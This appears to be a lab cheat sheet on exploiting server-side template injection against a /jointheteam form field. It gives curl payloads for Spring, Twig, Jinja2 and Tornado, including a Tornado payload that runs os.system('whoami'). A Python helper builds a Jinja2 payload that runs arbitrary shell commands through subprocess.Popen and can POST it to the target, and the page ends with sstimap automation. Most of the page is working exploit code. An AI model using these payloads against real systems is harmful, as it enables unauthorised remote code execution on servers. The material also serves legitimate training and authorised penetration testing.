SSTI Exploitation Example 2

curl -X POST -d 'email=${7*7}' http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (Spring payload: ${7*7} renders as 49 when a ${...} engine such as Spring evaluates it)

curl -X POST -d 'email={{_self.env.display("TEST")}}' http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (Twig payload)

curl -X POST -d 'email={{config.items()}}' http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (basic Jinja2 injection: config is the Flask configuration object exposed to templates, so a dump of it confirms Jinja2 under Flask)

curl -X POST -d 'email={{ [].__class__.__base__.__subclasses__() }}' http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (Jinja2 payload that dumps every subclass of object; the position of a useful class in this list, such as subprocess.Popen, is the index used in the follow-up payload)
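Follow-up to the dump-all-classes step, added here as an example (this is not code from the original page): once the target echoes back the __subclasses__() list, this helper parses it, finds the index of subprocess.Popen, builds the Jinja2 payload that calls it, and produces a properly URL-encoded form body for the email field used in the commands above. The class dump is a constructed, truncated sample; the /jointheteam endpoint is taken from the commands above, and send_payload is an assumed helper that the offline part does not need.

```python
import re
import urllib.parse
import urllib.request
from typing import List, Optional

# Constructed, heavily truncated sample of what a Jinja2 target echoes back for
# {{ [].__class__.__base__.__subclasses__() }}. A real dump lists several
# hundred classes; only the ordering is realistic here.
SAMPLE_DUMP = (
    "[<class 'type'>, <class 'async_generator'>, <class 'bytearray_iterator'>, "
    "<class 'weakref'>, <class 'os._wrap_close'>, <class 'subprocess.Popen'>, "
    "<class 'jinja2.environment.Environment'>]"
)

CLASS_RE = re.compile(r"<class '([^']+)'>")


def parse_subclasses(dump: str) -> List[str]:
    """Dotted class names in the order Python printed them. The position in
    this list is the index the follow-up payload must use, so never sort it."""
    return CLASS_RE.findall(dump)


def find_subclass_index(dump: str, name: str) -> Optional[int]:
    """Index of the class whose dotted name is exactly `name`, or None."""
    for idx, cls in enumerate(parse_subclasses(dump)):
        if cls == name:
            return idx
    return None


def build_popen_payload(index: int, cmd: str) -> str:
    """Jinja2 payload that runs `cmd` through subprocess.Popen at `index`.
    stdout=-1 is subprocess.PIPE written as a literal, because the template
    cannot import the module's constant; communicate()[0] returns stdout."""
    if "'" in cmd:
        raise ValueError("command must not contain single quotes")
    return (
        "{{ [].__class__.__base__.__subclasses__()[%d]"
        "('%s', shell=True, stdout=-1).communicate()[0] }}" % (index, cmd)
    )


def plan_rce(dump: str, cmd: str) -> str:
    """Turn a class dump into the RCE payload, or say what to look for next."""
    idx = find_subclass_index(dump, "subprocess.Popen")
    if idx is None:
        # Popen is not always present; os._wrap_close.__init__.__globals__
        # exposes the os module as a fallback on most targets.
        raise LookupError("subprocess.Popen not in dump; try os._wrap_close")
    return build_popen_payload(idx, cmd)


def form_body(payload: str, field: str = "email") -> str:
    """application/x-www-form-urlencoded body. curl -d sends the string as-is,
    so a payload containing %, +, & or # can be mangled by the server's form
    decoder; percent-encoding everything avoids that."""
    return urllib.parse.urlencode({field: payload})


def send_payload(url: str, payload: str, field: str = "email") -> str:
    """POST the encoded payload to the target (assumed helper, network only)."""
    data = form_body(payload, field).encode()
    with urllib.request.urlopen(url, data=data, timeout=10) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    payload = plan_rce(SAMPLE_DUMP, "id")
    print(payload)
    print(form_body(payload))
    # send_payload("http://<TARGET IP>:<PORT>/jointheteam", payload)
```

The same encoding point applies to the curl commands on this page: curl -d passes the body verbatim, so for payloads containing %, + or & use curl --data-urlencode 'email=...' instead, or the server-side form decoder may alter the template before it is rendered.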

curl -X POST -d "email={% import os %}{{os.system('whoami')}}" http://<TARGET IP>:<PORT>/jointheteam

Interacting with the remote target (Tornado payload)

./sstimap.py -u 'http://<TARGET IP>:<PORT>/jointheteam' -d email=blah

Automating the exploitation process with sstimap (-u is the target URL, -d the POST body with the injectable field)
